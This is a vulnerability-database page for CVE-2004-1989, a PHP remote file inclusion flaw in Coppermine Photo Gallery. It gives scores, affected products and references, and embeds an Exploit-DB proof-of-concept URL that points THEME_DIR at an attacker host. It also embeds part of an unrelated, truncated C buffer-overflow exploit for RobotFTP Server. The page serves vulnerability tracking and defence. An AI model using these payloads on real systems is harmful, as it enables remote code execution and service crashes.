CVE-2004-1989
published 2004-04-30CVE-2004-1989: PHP remote file inclusion vulnerability in theme.php in Coppermine Photo Gallery 1.2.2b allows remote attackers to execute arbitrary PHP code by modifying the…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
9.33%
94.8th percentile
PHP remote file inclusion vulnerability in theme.php in Coppermine Photo Gallery 1.2.2b allows remote attackers to execute arbitrary PHP code by modifying the THEME_DIR parameter to reference a URL on a remote web server that contains user_list_info_box.inc.
Affected
11 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| coppermine | coppermine_photo_gallery | — | — |
| coppermine | coppermine_photo_gallery | — | — |
| coppermine | coppermine_photo_gallery | — | — |
| coppermine | coppermine_photo_gallery | — | — |
| coppermine | coppermine_photo_gallery | — | — |
| coppermine | coppermine_photo_gallery | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Coppermine Photo Gallery 1.2.2b - 'theme.php' Remote File Inclusion
exploitdb·2004-04-30
CVE-2004-1989 Coppermine Photo Gallery 1.2.2b - 'theme.php' Remote File Inclusion
Coppermine Photo Gallery 1.2.2b - 'theme.php' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/10253/info
Coppermine Photo Gallery is reported prone to multiple input-validation vulnerabilities, some of which may lead to arbitrary command execution. These issues occur because the application fails to properly sanitize and validate user-supplied input before using it in dynamic content and in function calls that execute system commands.
Attackers may exploit these issues to steal cookie-based authentication credentials, map the application root directory of the affected application, execute arbitrary commands, and include arbitrary files. Other attacks are also possible.
http://www.example.com/nuke72/modules/coppermine/themes/default/theme.php?THEME_DIR=http://attack
Exploit-DB
RobotFTP Server 1.0/2.0 - 'Username' Buffer Overflow (1)
exploitdb·2004-02-16
CVE-2004-0286 RobotFTP Server 1.0/2.0 - 'Username' Buffer Overflow (1)
RobotFTP Server 1.0/2.0 - 'Username' Buffer Overflow (1)
---
// source: https://www.securityfocus.com/bid/9672/info
A vulnerability has been reported for RobotFTP Server. The problem likely occurs due to insufficient bounds checking when processing 'USER' command arguments of excessive length.
/******************************
this is example code for the vulnerability. It uses the windows ftp client to connect to a server
******************************/
#include
char buffer[2500];
char cmd[50];
int main(int argc, char *argv[])
{
FILE *evil;
if(argv[1] == NULL)
{
printf("Usage: %s [IP]\n\n",argv[0]);
return 0;
}
memset(buffer,0x41,47);
memcpy(buffer+47,"\r\n",2);
memcpy(buffer+49,"crash",5);
memcpy(buffer+54,"\r\n",2);
memcpy(buffer+56,"USER ",5);
memset(buffer+61,0x41,1989);
memset(
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=108360247732014&w=2http://secunia.com/advisories/11524http://securitytracker.com/id?1010001http://www.osvdb.org/5912http://www.securityfocus.com/bid/10253http://www.waraxe.us/index.php?modname=sa&id=26https://exchange.xforce.ibmcloud.com/vulnerabilities/16041http://marc.info/?l=bugtraq&m=108360247732014&w=2http://secunia.com/advisories/11524http://securitytracker.com/id?1010001http://www.osvdb.org/5912http://www.securityfocus.com/bid/10253http://www.waraxe.us/index.php?modname=sa&id=26https://exchange.xforce.ibmcloud.com/vulnerabilities/16041
2004-04-30
Published